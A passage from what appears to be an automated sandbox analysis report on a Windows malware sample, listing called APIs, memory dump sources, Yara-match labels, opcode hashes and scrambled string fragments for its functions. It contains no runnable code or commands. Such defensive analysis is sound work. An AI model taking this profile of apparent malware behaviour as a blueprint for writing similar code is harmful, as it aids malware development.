                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0247024D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                          • Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14
                                                                                                                                                                                                                                                          Function 0043C5AF Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043C5AF
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043C5C0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                                          • Opcode ID: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
                                                                                                                                                                                                                                                          • Instruction ID: 333b4a9834557b4172d2651f462c7a903e8ce65bf7bd4680bd615953da4b5774
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80D05EE995150047CA04BB71AC858273229F64B34A7186878E00301262EA25A0428B5B
                                                                                                                                                                                                                                                          Function 02470E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 411 2470e0f-2470e24 SetErrorMode * 2 412 2470e26 411->412 413 2470e2b-2470e2c 411->413 412->413
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02470223,?,?), ref: 02470E19
                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02470223,?,?), ref: 02470E1E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                          • Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                          Function 0043C2D0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 414 43c2d0-43c2e1 415 43c2f6-43c308 call 43d950 RtlReAllocateHeap 414->415 416 43c315-43c31e call 43a940 414->416 417 43c30a-43c313 call 43a910 414->417 418 43c2e8-43c2ef 414->418 425 43c320-43c322 415->425 416->425 417->425 418->415 418->416
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B308,00000000,00000001), ref: 0043C302
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
                                                                                                                                                                                                                                                          • Instruction ID: 8a0177ad85e7c08c69245f52b8f4417eb00afcd063061f7275faf4d6d67a0887
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE02B76418221ABC6002B25BC09B5B3A68DF8E721F030C36F40072121D739E81286EF
                                                                                                                                                                                                                                                          Function 0040C5C0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 426 40c5c0-40c5f1 CoInitializeEx
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                          • Opcode ID: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
                                                                                                                                                                                                                                                          • Instruction ID: ce014e1d32f27ec12ad37ecc0dfb2a09a1fae06e6abce3ab2790199683b38062
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD02E2969000027D208AB2CAC07F23329D9B03B52F000239E1A3969E2ED406900826A
                                                                                                                                                                                                                                                          Function 00409D3E Relevance: 1.5, APIs: 1, Instructions: 17networkCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202), ref: 00409D57
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Startup
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                                                                                                                          • Opcode ID: c762492f77ef8383059f4507e25c1adb5b493a45ba99c1c68facf99e2ce72a69
                                                                                                                                                                                                                                                          • Instruction ID: 053523fb6dd4afe8cef3d8c09916653202b249c7e86413b2563bb4d9ce308e2c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c762492f77ef8383059f4507e25c1adb5b493a45ba99c1c68facf99e2ce72a69
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D0A779745501B7DB0CAF24FC6AA2A3694DB4BB46F04003DB403D22E2DD218A609518
                                                                                                                                                                                                                                                          Function 0040C5F5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C607
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                                                          • Opcode ID: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
                                                                                                                                                                                                                                                          • Instruction ID: 64d0c7dc1a51f575c656917cfcf27d06668b7b4f648f1d88eb1df91404deb98c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7D0C9743C834176F5348B08EC13F5132555302F12F340624F362FE2E4CAD0B201860C
                                                                                                                                                                                                                                                          Function 0043A940 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,0043C31B,?,0040B308,00000000,00000001), ref: 0043A960
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                          • Opcode ID: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
                                                                                                                                                                                                                                                          • Instruction ID: c567b57adf38a1f54fef76dd5790cc9636adae08f6cfb23484a9f5fe40784e0e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42D01272419632FBC6102F18BC15BCB3B55EF4A321F0748A2F5446A175D774DC91CAD8
                                                                                                                                                                                                                                                          Function 0043A92B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A931
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
                                                                                                                                                                                                                                                          • Instruction ID: 2264aa9d2aabd2ef6d2248d85dbb31dab42ea94ade32cd6cf29d8f8327bb6f23
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18A012300401109AC5141B00BD09FC53E10DB11211F010051B000040B182508841C5C4
                                                                                                                                                                                                                                                          Function 009A991D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009A996E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9a9000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                          • Instruction ID: 7e6ae945e1ad9deacbda4d6e4840ec046eea135f2c92e5eb09e554c14f995a9b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5112A79A00208EFDB01DF98C985E99BBF5AB49350F058094F9489B362D371EA50DB81
                                                                                                                                                                                                                                                          Function 0040D0F8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3861434553-0
                                                                                                                                                                                                                                                          • Opcode ID: 2f66f3a0d5cf90002a3e6a9fa3fcee9ac7d9c218353d55ba06cc219d7cd29388
                                                                                                                                                                                                                                                          • Instruction ID: d9540b01f5847f02dc4681d7ac8599416201f8ff36d73ea169f27b9f71756f01
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f66f3a0d5cf90002a3e6a9fa3fcee9ac7d9c218353d55ba06cc219d7cd29388
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46D022BCD0C106CBE208DF21EC40436B2B2AFCF30AF14583AD003232B2E636A4118A0E

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 02481EA7 Relevance: 133.2, Strings: 105, Instructions: 1974COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
                                                                                                                                                                                                                                                          • API String ID: 0-2173774466
                                                                                                                                                                                                                                                          • Opcode ID: 613c8e147c67d88f1679a4c1d382fc397d039c2bac889df07ef81e194eacbfd5
                                                                                                                                                                                                                                                          • Instruction ID: ac2beedd933460f3ba4222b2b0d50247177fc024c692f859e84907f08a89864b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 613c8e147c67d88f1679a4c1d382fc397d039c2bac889df07ef81e194eacbfd5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD139C7161C7C08AD335EB28C4543AFBFE2ABD6314F088A6ED4D987392D6B98445CB53
                                                                                                                                                                                                                                                          Function 00411C40 Relevance: 133.2, Strings: 105, Instructions: 1974COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
                                                                                                                                                                                                                                                          • API String ID: 0-2173774466
                                                                                                                                                                                                                                                          • Opcode ID: b9753955d8b0ad29877f9f28243419e93db33d3574ea54cea941ce0070e24877
                                                                                                                                                                                                                                                          • Instruction ID: af53e175c28fad5d8c2a468ceeaa10e57feed0e13a8b405b96cf19100150d275
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9753955d8b0ad29877f9f28243419e93db33d3574ea54cea941ce0070e24877
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA13BE7160C7C08AD335DB38C4443AFBBE1ABD6314F188A6EE4D987392D6B98581CB57
                                                                                                                                                                                                                                                          Function 024A5DFF Relevance: 85.4, Strings: 68, Instructions: 403COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: c701f8ff301ff4d564478b7e145c54238edd9269f203648a2ce05032ff415add
                                                                                                                                                                                                                                                          • Instruction ID: 858507aa584cf820fcee936bcb237444eab22d99ea273c95f327deba7f7eacfc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c701f8ff301ff4d564478b7e145c54238edd9269f203648a2ce05032ff415add
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33228021D087D98EDB22C67C88583DDBFB11B67224F0843D9D4E96B3D2C7754A46CBA2
                                                                                                                                                                                                                                                          Function 00435B98 Relevance: 85.4, Strings: 68, Instructions: 403COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: 5571d7a2c4e6fe242554b8ee8fbc541d345d9774545682d32326d94ed6a6aae3
                                                                                                                                                                                                                                                          • Instruction ID: 770335e5a42f9b4d615ca172ea7afd8b2f0587deb4f207754e917c3cbcfa6561
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5571d7a2c4e6fe242554b8ee8fbc541d345d9774545682d32326d94ed6a6aae3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C224121D087D98DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7794A46CBA6
                                                                                                                                                                                                                                                          Function 024A681B Relevance: 85.4, Strings: 68, Instructions: 398COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: d810674a082763aa70e2500657bedc2216948e509afcc73f942382a721652a8c
                                                                                                                                                                                                                                                          • Instruction ID: 249ebcf4ec149b743213101689c7c094816aa5abeba1e5f208d66dca9af544ea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d810674a082763aa70e2500657bedc2216948e509afcc73f942382a721652a8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46226F21D087DACDDB22C67C885839DBFB11B27224F0843D9D4E96B3D2C7754A46CBA6
                                                                                                                                                                                                                                                          Function 004365B4 Relevance: 85.4, Strings: 68, Instructions: 398COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: bf3661bb3983fb85d3086f1722b7d7b11c57bc7e0144b52ab0816061f3dab287
                                                                                                                                                                                                                                                          • Instruction ID: de50ea2c20b4176c8acefd8da3a13ecea5557a43b1ccc23e89203943b2e10b97
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3661bb3983fb85d3086f1722b7d7b11c57bc7e0144b52ab0816061f3dab287
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99225121D087DA8DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7754A46CBA6
                                                                                                                                                                                                                                                          Function 024A52D4 Relevance: 39.1, Strings: 31, Instructions: 329COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $$0$1$4$<$>$M$Q$R$S$U$a$b$c$c$e$g$g$i$k$m$n$o$q$s$u$w$y${$}$~
                                                                                                                                                                                                                                                          • API String ID: 0-379513683
                                                                                                                                                                                                                                                          • Opcode ID: db3bbc2852807f260050379881b4d3eba7f21407b1fc4a639028f95d2bc8165e
